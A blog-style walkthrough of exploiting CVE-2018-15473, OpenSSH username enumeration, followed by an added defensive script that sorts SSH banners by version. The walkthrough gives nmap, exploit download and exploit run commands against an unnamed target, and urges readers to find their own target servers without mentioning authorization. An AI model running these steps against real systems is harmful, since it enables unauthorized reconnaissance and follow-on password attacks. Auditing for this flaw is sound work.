Enumerating Usernames on SSH servers (<7.7), CVE-2018-15473

by hash3liZer . 26 August 2018


Researchers recently exposed a small defect in the OpenSSH server that lets them enumerate the registered usernames on a server by exploiting the way it behaves on forged requests. For a username that doesn't exist, the server responds with an authentication failure, while for a username that does exist the response is different. This small difference in behaviour leads to username enumeration, and all OpenSSH versions prior to 7.7 are vulnerable.

Though the patch has been released, the installed base is large, so it could take at least months for everything to settle back to normal. An attacker can simply compile a list of usernames and perform a mass-enumeration attack on the server, and with the enumerated usernames a similar procedure can then be carried out for passwords too.

The vulnerability is assigned the ID CVE-2018-15473. So, we're going to test a server that has OpenSSH installed.

A large number of usernames can be enumerated this way. The results can also help in finding peculiarities that are specific to certain environments.

Let's get going:

Target

Find yourself a target server. Do a port scan and look for any OpenSSH services prior to version 7.7. I already have one, and to hide its identity I'll be using the name redacted.com instead of the real domain. Here's what I got from the nmap scan:

$ nmap -sS -sV -O redacted.com

STEP 2

Get the exploit.

The exploit is available on exploit-db under the id 45233 written by Justin Gardner.

$ wget https://www.exploit-db.com/download/45233.py

STEP 3

Fire the script:

$ python 45233.py --port [port] --username [username] redacted.com
# OR in case of a list
$ python 45233.py --port [port] --userList [/path/to/file] --threads 10 redacted.com

In our case, we got:

$ python 45233.py --port 2222 --username root redacted.com

Conclusion

Stay alert and always try to keep all of your applications up to date.
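
To act on that for your own hosts, here is an added example (not from the original post or the exploit's author) that classifies collected SSH banners against the version boundary this post gives. The hostnames, banners and function names are constructed for illustration, and the boundary is a parameter because a banner version alone cannot show a distribution's backported fix.

```python
import re

# Boundary as stated in this post ("prior to 7.7"); confirm with your vendor's advisory.
AFFECTED_BELOW = (7, 7)

# RFC 4253 identification string: SSH-protoversion-softwareversion [SP comments]
BANNER_RE = re.compile(r"^SSH-[\d.]+-(?P<software>\S+)(?: (?P<comment>.*))?$")
OPENSSH_RE = re.compile(r"^OpenSSH_(?:for_Windows_)?(\d+)\.(\d+)")

# Constructed sample inventory (hostnames and banners are made up).
SAMPLE_INVENTORY = {
    "bastion.example.internal": "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3",
    "build01.example.internal": "SSH-2.0-OpenSSH_7.9",
    "router.example.internal": "SSH-2.0-dropbear_2019.78",
    "win01.example.internal": "SSH-2.0-OpenSSH_for_Windows_7.6",
    "broken.example.internal": "220 ftp ready",
}


def classify_banner(banner, affected_below=AFFECTED_BELOW):
    """Return 'affected', 'ok', 'not-openssh' or 'unparsed' for one banner."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return "unparsed"
    v = OPENSSH_RE.match(m.group("software"))
    if not v:
        return "not-openssh"
    version = (int(v.group(1)), int(v.group(2)))
    return "affected" if version < affected_below else "ok"


def audit(inventory, affected_below=AFFECTED_BELOW):
    """Return [(host, verdict, note)] for hosts that need follow-up."""
    findings = []
    for host, banner in inventory.items():
        verdict = classify_banner(banner, affected_below)
        if verdict not in ("affected", "unparsed"):
            continue
        m = BANNER_RE.match(banner.strip())
        vendor = m.group("comment") if m else None
        # Distributions backport fixes without changing the upstream version.
        note = f"vendor build {vendor}: check changelog for backport" if vendor else ""
        findings.append((host, verdict, note))
    return findings


if __name__ == "__main__":
    for host, verdict, note in audit(SAMPLE_INVENTORY):
        print(f"{host:28} {verdict:9} {note}")
```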